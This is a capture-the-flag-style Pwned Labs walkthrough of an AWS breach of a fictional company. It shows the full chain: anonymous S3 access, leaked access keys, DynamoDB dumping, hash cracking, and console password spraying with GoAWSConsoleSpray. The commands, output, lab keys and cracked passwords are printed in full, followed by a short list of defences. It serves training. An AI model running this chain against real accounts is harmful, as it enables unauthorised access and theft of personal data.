Pwned Labs - Execute and Identify Credential Abuse in AWS

Scenario

During your routine audit for Huge Logistics, you’ve come across an unsecured S3 bucket. Your task for the day: dive into the bucket’s contents and scrutinize them. If you stumble upon any sensitive data, document it and use it as a pivot to understand the broader security posture of Huge Logistics’ cloud environment. Your goal is to determine the risk exposure of this open bucket and gain access to other connected systems.

Learning Outcomes

- S3 bucket enumeration

- Leveraging tools to automate IAM permissions enumeration

- DynamoDB enumeration and data exfiltration

- Password hash identification and cracking with Jumbo John

- Use Vim macro to automate data manipulation

- Credential stuffing / brute force against AWS console

- Detect online brute force attack using CloudTrail

- Detect compromised IAM user using Amazon Athena

- Gain an understanding of how this attack chain could have been prevented

Real World Context

Password reuse and credential stuffing attacks are prevalent security issues in both on-premise and cloud settings. Many users recycle passwords across platforms, making them vulnerable if one service gets breached. Attackers exploit this with credential stuffing, using known username-password combinations to access various services. Additionally, sensitive data is often stored improperly in both environments, with developers and users sometimes placing secrets in non-secure applications or repositories. This underscores the need for better password practices and secure storage methods across all systems.

Entry Point

hl-storage-general

Attack

Since we only have the bucket name, we query it with the AWS CLI, passing the --no-sign-request flag. This tells the AWS CLI not to sign the request with our credentials, so the bucket is accessed anonymously. The listing shows a file called asana-cloud-migration-backup.json

❯ aws s3 ls s3://hl-storage-general --no-sign-request

PRE migration/

❯ aws s3 ls s3://hl-storage-general --recursive --no-sign-request

2023-08-10 04:11:01 0 migration/

2023-08-10 04:11:29 147853 migration/asana-cloud-migration-backup.json

We will download the file and see what it contains.

❯ aws s3 cp s3://hl-storage-general/migration/asana-cloud-migration-backup.json . --no-sign-request

download: s3://hl-storage-general/migration/asana-cloud-migration-backup.json to ./asana-cloud-migration-backup.json

The JSON file has 4963 lines and appears to relate to a migration. While scanning it, we noticed a notes section, which we grep out and pipe into Vim by running the command cat asana-cloud-migration-backup

With the data in Vim, we apply some formatting to make it more readable. Follow these steps:

- Start by entering the command gg0 to move to the beginning of the file.

- Next, record a macro to streamline the formatting. In Normal mode, press qq to start recording into register q, then enter the following sequence of commands (the spaces here separate the individual commands):

d3f" f" d$ j0 q

Explanation of commands:

- d3f": Delete from the cursor to the third occurrence of " in the current line.

- f": Move the cursor to the next occurrence of ".

- d$: Delete from the cursor to the end of the line.

- j0: Move the cursor down one line and to the beginning.

- q: End recording the macro.

- Once the macro is recorded, execute it by specifying a numerical value. You can use a large number like 50 with @q to ensure it processes the entire file, even if the number exceeds the total lines.

Command to execute the Macro:

50@q

This applies the recorded macro (@q) 50 times, cleaning up the formatting across the file. The result is much easier to read, and in it we find an Access Key and Secret Key. We configure these in the CLI and can see that they belong to the migration-test user.

❯ aws --profile pentester configure

AWS Access Key ID [None]: AKIATRPHKUQK4TXINWX4

AWS Secret Access Key [None]: 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

Default region name [None]:

Default output format [None]:

❯ aws --profile pentester sts get-caller-identity

{

"UserId": "AIDATRPHKUQK2AQGRYR46",

"Account": "243687662613",

"Arn": "arn:aws:iam::243687662613:user/migration-test"

}
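As an aside, the Vim macro used earlier can be approximated non-interactively with sed. The following is a minimal sketch, assuming each grepped line has the shape "notes": "value", with nothing unusual inside the value. The sample lines and file names are made up for illustration and are not taken from the backup file.

```shell
#!/usr/bin/env bash
# Sketch: a sed one-liner that mirrors the Vim macro d3f" f" d$.
# Assumption: every input line looks like   "notes": "some value",
# The sample lines below are hypothetical.
workdir=$(mktemp -d)
cat > "$workdir/notes_raw.txt" <<'EOF'
      "notes": "Move the reporting database first",
      "notes": "Ask the cloud team for an access key",
EOF

# Drop everything up to and including the third double quote (d3f"),
# keep the text up to the next double quote, and drop the rest (f" d$).
sed -E 's/^[^"]*"[^"]*"[^"]*"([^"]*)".*$/\1/' \
    "$workdir/notes_raw.txt" > "$workdir/notes_clean.txt"

cat "$workdir/notes_clean.txt"
```

Like the macro, this cuts a value short if it contains an escaped double quote, so the output is worth a quick visual check.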

We will use AWS Enumerator, and the first thing we need to do is pass in our credentials

❯ aws-enumerator cred -aws_access_key_id AKIATRPHKUQK4TXINWX4 --aws_secret_access_key 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 -aws_region us-east-1

Message: File .env with AWS credentials were created in current folder

❯ aws-enumerator enum -services all

Message: Successful APPMESH: 0 / 1

Message: Successful AMPLIFY: 0 / 1

< -- snip -- >

Message: Successful EKS: 0 / 1

Message: Successful DEVICEFARM: 0 / 10

Message: Successful DYNAMODB: 5 / 5

Message: Successful ECR: 0 / 2

Message: Successful ECS: 0 / 8

Message: Successful FIREHOSE: 0 / 1

< -- snip -- >

We got a hit on DynamoDB, so we enumerate it further and can see two tables, analytics_app_users and user_order_logs

❯ aws-enumerator dump -services dynamodb -filter List -print

------------------------------------------------------------- DYNAMODB -------------------------------------------------------------

ListBackups

{

"ListBackups": {

"BackupSummaries": [],

"LastEvaluatedBackupArn": null,

"ResultMetadata": {}

}

}

------------------------------------------------------------------------------------------------------------------------------------

ListTables

{

"ListTables": {

"LastEvaluatedTableName": null,

"TableNames": [

"analytics_app_users",

"user_order_logs"

],

"ResultMetadata": {}

}

}

------------------------------------------------------------------------------------------------------------------------------------

ListGlobalTables

{

"ListGlobalTables": {

"GlobalTables": [],

"LastEvaluatedGlobalTableName": null,

"ResultMetadata": {}

}

}

------------------------------------------------------------------------------------------------------------------------------------

We are unable to describe user_order_logs but we were able to get additional information on analytics_app_users

❯ aws --profile pentester dynamodb describe-table --table-name analytics_app_users --region us-east-1

{

"Table": {

"AttributeDefinitions": [

{

"AttributeName": "UserID",

"AttributeType": "S"

}

],

"TableName": "analytics_app_users",

"KeySchema": [

{

"AttributeName": "UserID",

"KeyType": "HASH"

}

],

"TableStatus": "ACTIVE",

"CreationDateTime": "2023-08-10T04:23:16.704000+08:00",

"ProvisionedThroughput": {

"NumberOfDecreasesToday": 0,

"ReadCapacityUnits": 0,

"WriteCapacityUnits": 0

},

"TableSizeBytes": 7734,

"ItemCount": 51,

"TableArn": "arn:aws:dynamodb:us-east-1:243687662613:table/analytics_app_users",

"TableId": "6568c0bb-bdf7-4380-877c-05b7826505ad",

"BillingModeSummary": {

"BillingMode": "PAY_PER_REQUEST",

"LastUpdateToPayPerRequestDateTime": "2023-08-10T04:23:16.704000+08:00"

},

"TableClassSummary": {

"TableClass": "STANDARD"

},

"DeletionProtectionEnabled": true

}

}

We can see from the above that there are 51 records and that UserID is a String ("S") attribute that serves as the table's partition (HASH) key. We extract the data with a scan, but the output is not in an easy format to use for password cracking.

❯ aws --profile pentester dynamodb scan --table-name analytics_app_users --region us-east-1 > output.json

❯ head -n 25 output.json

{

"Items": [

{

"UserID": {

"S": "nbose"

},

"Role": {

"N": "0"

},

"FirstName": {

"S": "Nigel"

},

"LastName": {

"S": "Bose"

},

"Email": {

"S": "nbose@huge-logistics.com"

},

"PasswordHash": {

"S": "22edc41d491015e81f67da568fb2726cf739c42b2974d32d2f41163af4ccb1a3"

}

},

{

"UserID": {

"S": "fnoye"

There are several approaches that we could take to make this easily accessible, but we will use jq and awk to get this into a CSV file which will make it easier for us to use going forward:

❯ jq -r '.Items[] | [.UserID.S, .Role.N, .FirstName.S, .LastName.S, .Email.S, .PasswordHash.S] | @csv' output.json | awk 'BEGIN {print "UserID,Role,FirstName,LastName,Email,PasswordHash"} {print}' > output.csv

❯ head output.csv

UserID,Role,FirstName,LastName,Email,PasswordHash

"nbose","0","Nigel","Bose","nbose@huge-logistics.com","22edc41d491015e81f67da568fb2726cf739c42b2974d32d2f41163af4ccb1a3"

"fnoye","0","Frank","Noye","fnoye@huge-logistics.com","616bc4bbd5ba569131bd6fd76afbb9a69b327e2a0248a6377d86ca490460c6c8"

"jyoshida","0","Jos","Yoshida","jyoshida@huge-logistics.com","19924b2d08e2816a18b865a38b9b19fba587756cf652f9943fe07f7a7cb477cf"

"blee","0","Brian","Lee","blee@huge-logistics.com","40f123e673be9c142cd59bf3219d0f6b8219e9b99e0f9df5a7c2768ddab804e1"

"bsato","0","Brian","Sato","bsato@huge-logistics.com","631bc78fa722c499a8ce71167d5fe822d8fbaeaacfefe7ded5d2f67647e4f9da"

"ibaker","0","Irene","Baker","ibaker@huge-logistics.com","fea64339e5707795d507918d6c98925fce7e294a8690e5ed7cfd375df0295578"

"vkawasaki","0","Vic","Kawasaki","vkawasaki@huge-logistics.com","2c8c9030223e3192e96d960f19b0ecf9a9ba93175565cb987b28ec69b027ae86"

"hstone","0","Helen","Stone","hstone@huge-logistics.com","f1cb78978b5ad74ffaec55da9a0edb06c0ba52665046ada31682f082dfa1c2e7"

"vmuller","0","Victor","Muller","vmuller@huge-logistics.com","60081872664ffcaa0a26861ff96b47d35c85f56bacab7d62a11960bf955a4668"

We now need to convert this into a format that is easy to use with password crackers such as Hashcat and John the Ripper. With a little awk, we create a list in the format userID:PasswordHash

❯ awk -F "," 'NR > 1 {gsub("\"", "", $1); gsub("\"", "", $NF); print $1 ":" $NF}' output.csv > user_hash.lst

❯ head user_hash.lst

nbose:22edc41d491015e81f67da568fb2726cf739c42b2974d32d2f41163af4ccb1a3

fnoye:616bc4bbd5ba569131bd6fd76afbb9a69b327e2a0248a6377d86ca490460c6c8

jyoshida:19924b2d08e2816a18b865a38b9b19fba587756cf652f9943fe07f7a7cb477cf

blee:40f123e673be9c142cd59bf3219d0f6b8219e9b99e0f9df5a7c2768ddab804e1

bsato:631bc78fa722c499a8ce71167d5fe822d8fbaeaacfefe7ded5d2f67647e4f9da

ibaker:fea64339e5707795d507918d6c98925fce7e294a8690e5ed7cfd375df0295578

vkawasaki:2c8c9030223e3192e96d960f19b0ecf9a9ba93175565cb987b28ec69b027ae86

hstone:f1cb78978b5ad74ffaec55da9a0edb06c0ba52665046ada31682f082dfa1c2e7

vmuller:60081872664ffcaa0a26861ff96b47d35c85f56bacab7d62a11960bf955a4668

tmartins:a41cdf83893f8d9530d69782c9687f90d150656a77b84f42b624a7fcd5456e77
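Before cracking, it can be worth confirming that every line in the list is well formed. The sketch below assumes the hashes are 64 lowercase hex characters (256 bits), as in the entries shown above. It uses two entries copied from that list plus one deliberately broken, hypothetical line to show what a failure looks like.

```shell
#!/usr/bin/env bash
# Sketch: count well-formed and malformed user:hash lines.
workdir=$(mktemp -d)
# Two real entries from the list above and one made-up broken line.
cat > "$workdir/user_hash.lst" <<'EOF'
nbose:22edc41d491015e81f67da568fb2726cf739c42b2974d32d2f41163af4ccb1a3
fnoye:616bc4bbd5ba569131bd6fd76afbb9a69b327e2a0248a6377d86ca490460c6c8
broken:not-a-hash
EOF

# A valid line is a non-empty user name, a colon, and exactly 64 hex characters.
pattern='^[^:]+:[0-9a-f]{64}$'
good=$(grep -Ec  "$pattern" "$workdir/user_hash.lst")
bad=$(grep -Evc "$pattern" "$workdir/user_hash.lst")
echo "well-formed: $good, malformed: $bad"
```

Against the real user_hash.lst, a malformed count above zero would suggest that the comma-based awk split mangled a row, for example because a field contained a comma.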

Now that we have our username and password hash list, let's work out what type of hash this could be using hashid

❯ echo -n "22edc41d491015e81f67da568fb2726cf739c42b2974d32d2f41163af4ccb1a3" | hashid

Analyzing '22edc41d491015e81f67da568fb2726cf739c42b2974d32d2f41163af4ccb1a3'

[+] Snefru-256

[+] SHA-256

[+] RIPEMD-256

[+] Haval-256

[+] GOST R 34.11-94

[+] GOST CryptoPro S-Box

[+] SHA3-256

[+] Skein-256

[+] Skein-512(256)

SHA-256 is the logical choice from the above list, as it is the most commonly used of these algorithms. Running John the Ripper with the rockyou wordlist, we are able to crack 18 of the 51 passwords

❯ john --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA256 --fork=4 user_hash.lst

Using default input encoding: UTF-8

Loaded 51 password hashes with no different salts (Raw-SHA256 [SHA256 512/512 AVX512BW 16x])

Node numbers 1-4 of 4 (fork)

logistic (odas)

Press 'q' or Ctrl-C to abort, almost any other key for status

Password123 (nliu)

Summer01 (vkawasaki)

Abc123!! (rstead)

travelling08 (sgarcia)

airfreight (aramirez)

R0ckY0u! (gpetersen)

Wilco6!!! (fwallman)

freightliner01 (isilva)

shipping2 (cjoyce)

Sparkery2* (rthomas)

Tr@vis83 (pmuamba)

soccer!1 (pkaur)

southbeach123 (nwaverly)

montecarlo98 (bjohnson)

analytical (cchen)

1logistics (jyoshida)

4 6g 0:00:00:00 DONE (2024-07-01 15:47) 24.00g/s 14343Kp/s 14343Kc/s 664049KC/s !ILOVEJARE..*7¡Vamos!

3 5g 0:00:00:00 DONE (2024-07-01 15:47) 18.51g/s 13280Kp/s 13280Kc/s 619365KC/s !Iluvmike.1@RICK.a6_123

2 4g 0:00:00:00 DONE (2024-07-01 15:47) 14.81g/s 13280Kp/s 13280Kc/s 640522KC/s !Gw33Drag0n.abygurl69

01summertime (adell)

1 3g 0:00:00:00 DONE (2024-07-01 15:47) 10.71g/s 12806Kp/s 12806Kc/s 633329KC/s !JAYLOVE3.ie168

Waiting for 3 children to terminate

Use the "--show --format=Raw-SHA256" options to display all of the cracked passwords reliably

Session completed.
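To double-check that the hashes really are unsalted SHA-256, a cracked password can be re-hashed and compared with the stored value. This is a minimal sketch, assuming sha256sum from GNU coreutils is available (on macOS, shasum -a 256 plays the same role). The function names are illustrative, and the pair tested is vkawasaki's hash and cracked password from the output above.

```shell
#!/usr/bin/env bash
# Hex SHA-256 digest of a string, with no trailing newline added.
sha256_hex() {
    printf '%s' "$1" | sha256sum | awk '{print $1}'
}

# Succeeds when the candidate password hashes to the expected value.
matches_hash() {
    [ "$(sha256_hex "$1")" = "$2" ]
}

# Pair taken from the walkthrough: vkawasaki's stored hash and cracked password.
if matches_hash 'Summer01' '2c8c9030223e3192e96d960f19b0ecf9a9ba93175565cb987b28ec69b027ae86'; then
    echo "vkawasaki: unsalted SHA-256 confirmed"
else
    echo "vkawasaki: hash does not match"
fi
```

Using printf rather than echo matters here, because a trailing newline would change the digest.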

We can view these in a clean list, which we will use for credential stuffing to try to get console access

❯ john user_hash.lst --show --format=Raw-SHA256

jyoshida:1logistics

vkawasaki:Summer01

aramirez:airfreight

gpetersen:R0ckY0u!

cchen:analytical

rstead:Abc123!!

sgarcia:travelling08

adell:01summertime

rthomas:Sparkery2*

nliu:Password123

isilva:freightliner01

odas:logistic

pmuamba:Tr@vis83

pkaur:soccer!1

nwaverly:southbeach123

cjoyce:shipping2

fwallman:Wilco6!!!

bjohnson:montecarlo98

18 password hashes cracked, 33 left

We piped this into Vim, removed the unnecessary rows, and then ran some quick substitution commands to extract the usernames and passwords and write them out to their respective files.

Within Vim, go into command mode and enter %s/:.*//g, which strips away everything from the “:” onward, then save the result using w usernames.txt. Press u to undo, enter %s/.*://g to strip away the username portion, save with w passwords.txt, and exit Vim.
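The same split can be done without an editor. The following is a sketch using grep and cut, assuming the john --show output has been saved to a file (called cracked.txt here, a name chosen for illustration). The sample contains three pairs from the output above along with the trailing summary line.

```shell
#!/usr/bin/env bash
# Sketch: split user:password lines into two files without Vim.
workdir=$(mktemp -d)
# A few lines in the shape printed by john --show, including the summary.
cat > "$workdir/cracked.txt" <<'EOF'
jyoshida:1logistics
vkawasaki:Summer01
rstead:Abc123!!

18 password hashes cracked, 33 left
EOF

# Keep only the lines that contain a colon, then split on the first colon.
grep ':' "$workdir/cracked.txt" | cut -d: -f1  > "$workdir/usernames.txt"
grep ':' "$workdir/cracked.txt" | cut -d: -f2- > "$workdir/passwords.txt"

# Show the two lists side by side.
paste -d' ' "$workdir/usernames.txt" "$workdir/passwords.txt"
```

Using -f2- rather than -f2 keeps a password intact even if it contains a colon itself, whereas the greedy %s/.*://g substitution would keep only the text after the last colon.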

Now that we have a list of usernames and passwords, we will use GoAWSConsoleSpray, which we install by running the command go install github.com/WhiteOakSecurity/GoAWSConsoleSpray@latest. Running it with no flags gives the following output

❯ GoAWSConsoleSpray

Error: required flag(s) "accountID", "passfile", "userfile" not set

Usage:

GoAWSConsoleSpray [flags]

Flags:

-a, --accountID string AWS Account ID (required)

-d, --delay int Optional Time Delay Between Requests for rate limiting

-h, --help help for GoAWSConsoleSpray

-p, --passfile string Password list (required)

-x, --proxy string HTTP or Socks proxy URL & Port. Schema: proto://ip:port

-s, --stopOnSuccess Stop password spraying on successful hit

-u, --userfile string Username list (required)

-v, --verbose Enable verbose logging

This tool is loud and makes no attempt to hide itself, so caution should be exercised: there is a high probability that your IP could get blocked by AWS, and the login attempts will show up in CloudTrail logs.

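We run the spray against the account and, once a valid username and password are found, terminate the script manually (the -s / --stopOnSuccess flag listed above could be used to stop on the first hit instead)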

❯ GoAWSConsoleSpray -a 243687662613 -u usernames.txt -p passwords.txt

2024/07/01 16:11:20 GoAWSConsoleSpray: [18] users loaded. [18] passwords loaded. [324] potential login requests.

2024/07/01 16:11:20 Spraying User: arn:aws:iam::243687662613:user/jyoshida

2024/07/01 16:11:38 Spraying User: arn:aws:iam::243687662613:user/vkawasaki

2024/07/01 16:11:55 Spraying User: arn:aws:iam::243687662613:user/aramirez

2024/07/01 16:12:12 Spraying User: arn:aws:iam::243687662613:user/gpetersen

2024/07/01 16:12:30 Spraying User: arn:aws:iam::243687662613:user/cchen

2024/07/01 16:12:47 Spraying User: arn:aws:iam::243687662613:user/rstead

2024/07/01 16:12:53 (rstead) [+] SUCCESS: Valid Password: Abc123!! MFA: false

2024/07/01 16:12:53 Spraying User: arn:aws:iam::243687662613:user/sgarcia

2024/07/01 16:13:09 Spraying User: arn:aws:iam::243687662613:user/adell

2024/07/01 16:13:26 Spraying User: arn:aws:iam::243687662613:user/rthomas

We then proceed to the AWS Console and log in with the credentials that we found. The login succeeds, and we can see that the user has recently visited DynamoDB



Looking around, we find that we have access to the user_order_logs table. We can explore the table and export it to CSV, and it contains PII.

PWNED!

A public S3 bucket revealed more than expected, leading to a cascade of vulnerabilities stemming from common security pitfalls. From exposed credentials to lax access controls, each misstep paved the way for a series of lateral movements that culminated in a breach of sensitive data. This narrative serves as a stark reminder of the critical importance of robust defense measures and proactive security practices.

Remember:

- Avoid Storing Secrets in Applications

- Implement Robust Access Controls

- Enforce Strong Password Policies

- Monitor and Audit Activity, and Implement Rate Limiting to Detect and Prevent Brute-Force Attacks

- Deploy Multi-Factor Authentication

- Securely Manage Cloud Storage